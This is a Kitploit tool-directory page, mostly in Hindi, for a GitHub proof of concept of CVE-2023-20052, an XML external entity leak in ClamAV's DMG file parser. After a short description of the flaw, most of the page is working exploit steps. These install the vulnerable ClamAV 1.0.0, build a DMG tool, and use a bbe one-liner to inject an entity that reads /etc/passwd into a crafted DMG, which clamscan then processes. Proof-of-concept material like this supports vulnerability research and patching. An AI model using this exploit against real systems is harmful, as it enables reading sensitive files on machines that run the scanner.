Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-20052 — CVE-2023-20052 ClamAV के DMG फ़ाइल पार्सर में सूचना लीक भेद्यता | Kitploit
उपकरण/GitHubGitHub/cy83rr0h1t/cve-2023-20052
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनामालवेयर विश्लेषण
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 ClamAV के DMG फ़ाइल पार्सर में सूचना लीक भेद्यता

रिपॉजिटरी देखें
133 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-20052

CVE-2023-20052 ClamAV के DMG फ़ाइल पार्सर में सूचना रिसाव की भेद्यता
ClamAV संस्करण 1.0.0 और उससे पहले, 0.105.1 और उससे पहले, और 0.103.7 और उससे पहले के DMG फ़ाइल पार्सर में एक भेद्यता एक अप्रमाणित, दूरस्थ हमलावर को प्रभावित डिवाइस पर संवेदनशील जानकारी तक पहुँचने की अनुमति दे सकती है। यह भेद्यता XML एंटिटी प्रतिस्थापन को सक्षम करने के कारण है जिसके परिणामस्वरूप XML बाहरी एंटिटी इंजेक्शन हो सकता है। एक हमलावर प्रभावित डिवाइस पर ClamAV द्वारा स्कैन किए जाने के लिए एक गढ़ा हुआ DMG फ़ाइल प्रस्तुत करके इस भेद्यता का शोषण कर सकता है। एक सफल शोषण हमलावर को ClamAV स्कैनिंग प्रक्रिया द्वारा पढ़ी जा सकने वाली किसी भी फ़ाइल से बाइट्स लीक करने की अनुमति दे सकता है।

Ubuntu 20.04 में परीक्षण किया गया

ClamAV संस्करण 1.0.0 कैसे स्थापित करें

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f


  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

  • 5

    • clamscan --version
      6

    इस शोषण के लिए कुछ और चीजें स्थापित करना।

    • apt-get update

    • apt-get install -y ca-certificates gnupg wget

    • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

    • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

    • apt-get update -y

    • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
      7

    • git clone https://github.com/planetbeing/libdmg-hfsplus.git
      8

    • cd /libdmg-hfsplus

    • cmake .
      9

    • make
      10

    • cp dmg/dmg /bin
      sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
      11

    bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

    • clamscan --debug exploit2.dmg 13

    Reference: https://github.com/nokn0wthing/CVE-2023-20052

    टूल डाउनलोड करें